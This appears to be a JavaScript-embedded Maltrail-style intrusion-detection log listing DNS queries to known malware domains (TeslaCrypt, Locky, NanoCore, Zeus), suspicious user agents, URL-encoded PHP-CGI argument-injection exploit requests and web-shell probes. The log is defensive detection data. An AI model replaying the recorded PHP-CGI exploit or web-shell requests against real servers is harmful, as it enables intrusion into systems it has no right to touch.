    '"2021-01-11 02:34:57.785258" r2d2 2.200.110.233 63892 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:34:59.624960" r2d2 2.200.110.232 49199 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:34:59.834983" r2d2 2.200.110.233 63743 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:35:13.948599" r2d2 2.200.110.232 65099 2.200.107.168 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 02:35:13.974703" r2d2 2.200.107.146 7464 199.254.50.1 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 02:35:13.973313" r2d2 2.200.110.233 65530 2.200.107.169 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 02:35:59.608134" r2d2 2.200.110.232 64387 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:36:09.834877" r2d2 2.200.110.232 49406 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:36:09.861553" r2d2 2.200.110.233 64355 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:36:09.836230" r2d2 2.200.107.146 4107 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:36:15.609763" r2d2 2.200.107.146 18907 205.251.199.82 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 02:36:15.608063" r2d2 2.200.110.232 64224 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 02:36:35.092980" r2d2 10.3.160.42 23378 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:36:35.197401" r2d2 10.3.160.42 23378 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:36:35.292218" r2d2 10.3.160.42 23378 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:36:35.493253" r2d2 10.3.160.42 23378 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:36:35.791883" r2d2 10.3.160.42 23378 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:36:36.194050" r2d2 10.3.160.42 23378 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:36:36.697083" r2d2 10.3.160.42 23378 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:36:37.291669" r2d2 10.3.160.42 23378 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:36:43.381693" r2d2 2.200.110.232 64797 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 02:37:03.942694" r2d2 2.200.110.232 65197 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:37:03.944156" r2d2 2.200.107.146 29272 46.101.179.64 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:37:17.828908" r2d2 2.200.110.233 65077 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:37:17.828917" r2d2 2.200.110.233 63470 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 02:37:17.831195" r2d2 2.200.107.146 23090 193.232.128.6 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 02:37:17.831145" r2d2 2.200.107.146 54388 173.201.73.26 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:37:18.903849" r2d2 2.200.107.146 58720 190.202.128.43 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:37:18.901864" r2d2 2.200.110.233 64879 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:37:19.869820" r2d2 2.200.107.146 65533 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:37:19.868258" r2d2 2.200.110.232 64988 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:37:19.901193" r2d2 2.200.110.233 64908 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:37:24.477845" r2d2 2.200.110.233 64241 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 02:37:25.083274" r2d2 2.200.110.232 64403 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:37:25.084877" r2d2 2.200.107.146 10205 178.62.208.8 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:37:23.850802" r2d2 10.1.19.42 59464 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:37:43.381844" r2d2 2.200.110.232 63630 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:37:43.383845" r2d2 2.200.107.146 24720 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:37:59.620940" r2d2 2.200.110.232 49302 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:37:59.622059" r2d2 2.200.110.232 65398 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:37:59.624038" r2d2 2.200.107.146 63318 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:38:03.447455" r2d2 178.17.174.14 43318 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; BTRS100194; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:38:03.447471" r2d2 178.17.174.14 43318 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; BTRS100194; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:38:08.160566" r2d2 2.200.105.226 58306 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:38:08.191106" r2d2 2.200.105.226 58987 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:38:08.191161" r2d2 2.200.105.226 58987 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:38:03.447465" r2d2 178.17.174.14 43318 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; BTRS100194; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:38:15.734350" r2d2 193.8.83.32 53149 2.200.103.237 80 TCP HTTP "2.200.103.237(/cgi-bin/php5?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:38:19.758337" r2d2 193.8.83.32 53660 2.200.103.237 80 TCP HTTP "2.200.103.237(/cgi-bin/php-cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:38:19.758328" r2d2 193.8.83.32 53660 2.200.103.237 80 TCP HTTP "2.200.103.237(/cgi-bin/php-cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:38:23.695805" r2d2 193.8.83.32 54291 10.110.31.35 80 TCP HTTP "2.200.103.237(/cgi-bin/php.cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:38:23.695803" r2d2 193.8.83.32 54291 2.200.103.237 80 TCP HTTP "2.200.103.237(/cgi-bin/php.cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:38:27.429709" r2d2 2.200.110.232 49434 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:38:27.466125" r2d2 2.200.110.233 64104 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:38:27.769963" r2d2 193.8.83.32 54797 10.110.31.35 80 TCP HTTP "2.200.103.237(/cgi-bin/php4?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:38:27.770134" r2d2 2.200.110.233 63759 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:38:27.769884" r2d2 193.8.83.32 54797 2.200.103.237 80 TCP HTTP "2.200.103.237(/cgi-bin/php4?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:38:27.793608" r2d2 2.200.110.233 64901 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:38:28.530455" r2d2 2.200.110.233 64033 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 02:38:28.531854" r2d2 2.200.107.146 65281 194.190.124.17 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 02:38:29.900451" r2d2 2.200.110.232 49374 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:38:29.901257" r2d2 2.200.107.146 7079 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:38:29.934761" r2d2 2.200.110.233 64205 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:38:31.464324" r2d2 2.200.110.233 63672 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:38:43.397116" r2d2 2.200.110.232 63606 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 02:38:43.402696" r2d2 2.200.107.146 45978 192.35.51.30 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 02:38:48.430866" r2d2 193.8.83.32 59170 2.200.103.237 80 TCP URL (2.200.103.237)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:38:48.430915" r2d2 193.8.83.32 59170 10.110.31.35 80 TCP URL (2.200.103.237)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:38:48.430854" r2d2 193.8.83.32 59170 2.200.103.237 80 TCP URL (2.200.103.237)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:38:59.614247" r2d2 2.200.107.146 48633 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:38:59.612465" r2d2 2.200.110.232 63468 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:39:19.806267" r2d2 193.8.83.32 65019 10.110.31.35 80 TCP URL (2.200.103.237)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:39:19.806253" r2d2 193.8.83.32 65019 2.200.103.237 80 TCP URL (2.200.103.237)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:39:39.254008" r2d2 2.200.110.233 63671 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:39:39.950858" r2d2 2.200.110.232 64151 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:39:39.952242" r2d2 2.200.107.146 52556 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:39:39.977091" r2d2 2.200.110.233 65435 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:39:43.402741" r2d2 2.200.110.232 64024 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:39:43.568359" r2d2 2.200.107.146 50012 217.115.6.76 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:39:42.321898" r2d2 178.17.174.14 48538 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; FunWebProducts; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:40:20.407952" r2d2 193.8.83.32 11933 2.200.103.237 80 TCP URL (2.200.103.237/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:40:35.471633" r2d2 10.3.160.42 23380 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:40:35.574203" r2d2 10.3.160.42 23380 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:40:35.671301" r2d2 10.3.160.42 23380 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:40:35.871881" r2d2 10.3.160.42 23380 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:40:36.171617" r2d2 10.3.160.42 23380 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:40:36.571346" r2d2 10.3.160.42 23380 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:40:37.072721" r2d2 10.3.160.42 23380 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:40:43.380104" r2d2 2.200.110.232 65386 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:40:43.380111" r2d2 2.200.110.232 63629 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:40:43.381341" r2d2 2.200.107.146 16581 97.74.108.9 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:40:43.381908" r2d2 2.200.110.232 63975 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:40:43.384186" r2d2 2.200.110.232 65097 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 02:40:43.386197" r2d2 2.200.107.146 16346 192.55.83.30 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 02:40:43.388318" r2d2 2.200.110.232 64762 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:40:43.388681" r2d2 2.200.110.232 63715 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 02:40:43.393888" r2d2 2.200.110.232 64552 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:40:43.394907" r2d2 2.200.110.232 63550 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:40:43.399852" r2d2 2.200.110.232 64718 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:40:43.399324" r2d2 2.200.110.232 64591 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:40:43.401317" r2d2 2.200.110.232 64053 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 02:40:43.401771" r2d2 2.200.110.232 64018 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:40:43.404111" r2d2 2.200.107.146 30449 192.52.178.30 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:40:43.402269" r2d2 2.200.110.232 49297 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:40:43.403112" r2d2 2.200.107.146 3065 192.41.162.30 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:40:47.466823" r2d2 2.200.110.233 49180 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 02:40:47.516076" r2d2 2.200.110.233 63870 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:40:47.557500" r2d2 2.200.110.233 63878 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:40:49.985654" r2d2 2.200.110.233 63307 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:40:56.697576" r2d2 10.1.81.47 63482 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 02:40:56.698769" r2d2 2.200.109.50 61202 8.8.8.8 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 02:41:06.931465" r2d2 2.200.107.146 54983 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:41:06.929993" r2d2 2.200.110.232 65378 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:41:06.960234" r2d2 2.200.110.233 65230 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:41:45.390921" r2d2 10.1.19.42 59467 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:41:59.609361" r2d2 2.200.107.146 37398 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:41:59.607504" r2d2 2.200.110.232 49323 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:41:59.622974" r2d2 2.200.107.146 55057 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:41:59.621385" r2d2 2.200.110.232 64674 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:42:00.018458" r2d2 2.200.110.233 64754 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:42:13.872255" r2d2 2.200.110.232 65398 2.200.107.168 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:42:13.873778" r2d2 2.200.107.146 25268 173.245.58.63 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:42:14.269327" r2d2 2.200.110.232 49293 2.200.107.168 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:42:59.614402" r2d2 2.200.110.232 49427 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 02:43:03.191776" r2d2 10.2.232.50 60565 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:43:03.191774" r2d2 10.2.232.50 60565 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:43:07.475868" r2d2 2.200.110.233 65260 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 02:43:07.490217" r2d2 2.200.110.233 63567 2.200.107.169 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:43:07.515862" r2d2 2.200.110.233 64021 2.200.107.169 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:43:10.017119" r2d2 2.200.110.232 65083 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:43:03.202511" r2d2 10.2.232.50 60565 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
